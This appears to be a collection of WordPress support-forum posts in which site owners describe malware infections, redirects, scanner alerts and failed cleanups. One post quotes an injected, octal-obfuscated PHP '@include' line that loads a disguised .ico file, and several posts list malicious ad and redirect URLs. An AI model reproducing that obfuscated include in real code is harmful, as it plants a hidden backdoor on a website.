What would one do if one suspects that someone might have implanted malware on their site. Is there a WordPress tool to diagnose this.
Also, is there a way to do a fresh install of WordPress and then import only tables that contain posts, pages, categories and menu.
Hi, I can’t see my mobile version of the site, it shows infinite bad redirects!
Hello guys,
My domain name: ww.shoestoreindia.com. We use your plugin, after scanning it’s shows no malware or malicious content found.But i have email from Google Adwords, which i am sharing with you, please help me to remove these links on my website.
“”As discussed on call,Here I am sending the links to be removed from your website:
https://deloton.com/apu.php?zoneid=1594340
https://go.mobisla.com/notice.php?p=1594343&interactive=1&pushup=1
https://go.mobtrks.com/notice.php?p=1594346&interstitial=1
https://mobpushup.com/notice.php?p=1594343&interactive=1&pushup=1
https://mobpushup.com/notice.php?p=1594346&interstitial=1
“”
Please help me.
Hello,
Sorry for this message in English translated from French from Google Translate …
I have for some time a malware that redirects one of my blogs wordpress. The index.php file is infected with code 64. In WordPress I see an unknown plugin: pluginsamonsters that is installed.
Wordfence warns me that jsquery.php has been changed.
I reinstalled my database and a new wordpress but the malware comes back.
How to get rid of it?
Best regards
—–
Bonjour,
Désolé pour ce message en anglais traduit du français depuis Google Traduction…
J’ai depuis quelques temps un malware qui redirige un de mes blogs wordpress. Le fichier index.php est infecté avec un code 64. Dans WordPress je vois un plugin inconnu : pluginsamonsters qui est installé.
Wordfence me signale que jsquery.php a été modifié.
J’ai réinstallé ma base et un nouveau wordpress mais le malware revient.
Comment m’en débarrasser ?
Bien cordialement
Is there a way I can just pay for malware scanning? That is what I really want and I see that it is not included in the personal license (which I would totally pay for if it included malware scans)
So I finally finished up my site and set up google Adwords, to run some ads to promote my site. Everything was doing good! I was getting 5 figure ad views and my site was working well. Then….
I received an email from google stating I had malicious/spam links. I was told I can not be told exact info for safety reasons but that there were multiple links and it had this info: onclasrv[.]com
1) I downloaded WordFence and did a scan.
…..it found three links that said Malware! Including info about a plugin, text-file and that onclasrv link. So I deleted those links through the WordFence interface.
NOW, my site loads to a blank white page.
2) So I went to UpDraft to restore my site from the last back-up I had after completing building the site. It will not restore and gives me this error:
Looking for plugins archive: file name: backup_2018-05-17-2100_Elite_Therapeutic_Massage_77e3d839fb42-plugins.zip
Archive is expected to be size: 59944.5 KB: OK
Error: Existing unremoved folders from a previous restore exist (please use the “Delete Old Directories” button to delete them before trying again): /home/content/a2pewpnaspod05_data03/31/41471431/html/wp-content/plugins-old
Restore failed…
Error: Existing unremoved folders from a previous restore exist (please use the “Delete Old Directories” button to delete them before trying again): /home/content/a2pewpnaspod05_data03/31/41471431/html/wp-content/plugins-old
3) Downloaded a File Manager Plug-In and deleted the folders under wp-content->updraft … all directories ending with “-old” were deleted.
4) Went back to UpDraft to try to restore again. It gave me the same error. Now ALL of my plugins are also Gone!
Now I have no website, no backend plugins. Any help or suggestions?! 
Hi,
I see in the changelog that the new version of the plugin released today, 1.8.16, says it has new Terms of Service for GDPR compliance. Where are those terms? I don’t see them in the plugin files, nor do I see a link to them in the plugin’s dashboard.
My big question is whether the remote scanner processes user data, which is a potential GDPR issue.
Since scanning binary takes a huge amount of resources and slows down the scan time considerably, how does one include a file extension to scan instead of having to scan ALL binaries, images etc. For example, we know malicious codes hide in .ico files, how do we scan only .ico files? I’ve tried entering “.ico” in the additional scan pattern but it didn’t scan only .ico files.
Hi! My malware plugin has flagged these 2 files as known threats. Can I safely remove them or are they part of the plugin?
I am facing some issues with a recurring malware that redirects my site. My site is still under development. I don’t have any technical knowledge out website development. This website is for business I am about to start. I hope wordpress community will be able help me resolve this issue.
After I noticed this issue, I deleted the wordpress installation, changed all passwords and re-istalled through softaculous app installer on cPanel. The issue seemed to go away. There was no indication of a malware on any of the online website scan I performed. But the next morning, I was redirected to a span site again and online scans confirmed the malware. Since then I have tried wiping and reinstalling wordpress again. But the issue is recurring. I have installed wordfence security plugin and performed high sensitivity scans. It doesn’t detect any threats.
[ Redacted ]
It was last updated 2 years 3 months ago and tested up to WordPress 4.4.15. It may have compatibility problems with the current version of WordPress or unknown security issues.
Hi,
I have multiple WP sites and I’m facing with some strange files that appears in some database.
For example, I found this in index.php
<?php
/*1abac*/@include “\057ho\155e/\164es\154ab\145t/\141br\141ha\155ti\160s.\143om\057.w\145ll\055kn\157wn\057pk\151-v\141li\144at\151on\057.b\064d3\144e6\070.i\143o”;
/*1abac*/
The similar files, I found in wp-config.php.
I constantly clean them, but after one day or two, they appear again.
I reinstalled all WordPress site, all themes and plugins are up to date. I changes all passwords, Cpanel, admin passwords, but nothing changed.
I migrated to another hosting, but it didn’t help.
Also, I can see some .ico files, in /uploads or /wp-includes or some strange .php files, footer2.php or file25.php etc.
After I clean them, they appear again.
All sites are work fine, but I worry about all those strange files.
Do you know how to fix it?
Thanks.
I’m using a website monitoring service. Upon the last update of BackWPup, the monitoring service flagged the following file:
wp-content/plugins/backwpup/vendor/microsoft/windowsazure/tests/framework/RestProxyTestBase.php
How do I know this file is actually safe?
Thank you,
P.
Hi I installed this plugin to evaluate, but after removing it I keep getting the following message appearing in the dashboard:
Try Brizy: A Fast & Easy Way of Creating Pages Visually – More Details and a button saying ‘Activate now for free.
I click the X to remove but it keeps reappearing.
How do I completely remove?
I don’t understand the people who gave this plugin anything less than 5 stars.
Last night I spent over one hour with GoDaddy including half an hour being put on hold in order to have a spamming malware removed from one of my WP websites hosted by them. In the end they quoted me $300 or something to subscribe to their one year service to deal with the problem, which is a giant rip-off if you ask me.
Anyhow I searched all over the Web before I spotted this piece of gem called Anti-Malware Security and Brute-Force Firewall by Eli Scheetz. After spending half an hour understanding the product and checking out reviews of it, I went ahead and did the clean-up myself. Lo and behold, it worked like a charm! Afterwards I used GoDaddy’s premium app called “Website Security” for another round of scanning and I received this notice from GoDaddy:
Site is Malware Free, Not Blacklisted
I have just donated $15 to Eli but I WILL donate more later on if the app can stand the test of time.
Eli, thank you very much!
I did a scan and the scan said that these scripts were present, but for the life of me I cannot find the page that they are in.
https://eluxer.net/code?id=105&subid=51824_700…<SCRIPT>
https://urlvalidation.com/filter-domains?stub=8125…<SCRIPT>
https://urlvalidation.com/filter-domains?stub=1182…<SCRIPT>
https://trafficanalytics.cool/addons/lnkr30_nt.min…<SCRIPT>
https://trafficanalytics.cool/addons/lnkr5.min.js<SCRIPT>
https://worldnaturenet.xyz/91a2556838a7c33eac284ee…<SCRIPT>
https://worldnaturenet.xyz/91a2556838a7c33eac284ee…<SCRIPT>
What is the reason for this? These files are flagged as threats. In earlier version also this happened and my functions.php file got modified after activating the plugin. Is there something fishy?
Below is the message I got while scanning
Known Threats
/public_html/wp-content/plugins/atum-stock-manager-for-woocommerce/vendor/mpdf/mpdf/data/patterns/fr.php
/public_html/wp-content/plugins/atum-stock-manager-for-woocommerce/vendor/mpdf/mpdf/data/patterns/pl.php
/public_html/wp-content/plugins/atum-stock-manager-for-woocommerce/vendor/mpdf/mpdf/data/patterns/sv.php
/public_html/wp-content/plugins/atum-stock-manager-for-woocommerce/vendor/mpdf/mpdf/patterns/fr.php
/public_html/wp-content/plugins/atum-stock-manager-for-woocommerce/vendor/mpdf/mpdf/patterns/pl.php
/public_html/wp-content/plugins/atum-stock-manager-for-woocommerce/vendor/mpdf/mpdf/patterns/sv.php
I keep having this JS file just loop and crash firefox and other browsers.. Chrome will just look right past it.
This is what Firefox says the problem comes from
getElementByLocators
starkDOMEditPlayer</this.applyEditsToDynamicSite/observer<
HOWEVER, i have fully cleaned out and reinstalled the wordpress.. i mean every aspect of it.
Any advice? Godaddy has nothing.
Dear all,
I got hacked with this code:
[redacted by moderator]
I had cleaned the index file and delete other file that code create, reinstall WordPress and the template, after around 24 hours everything comes back.
I really need help on that.
Looking forward for any help.
Best regards,
Leandro
Was a small but useful plugin. Suddenly you want me to pay? Sorry, already deleted…..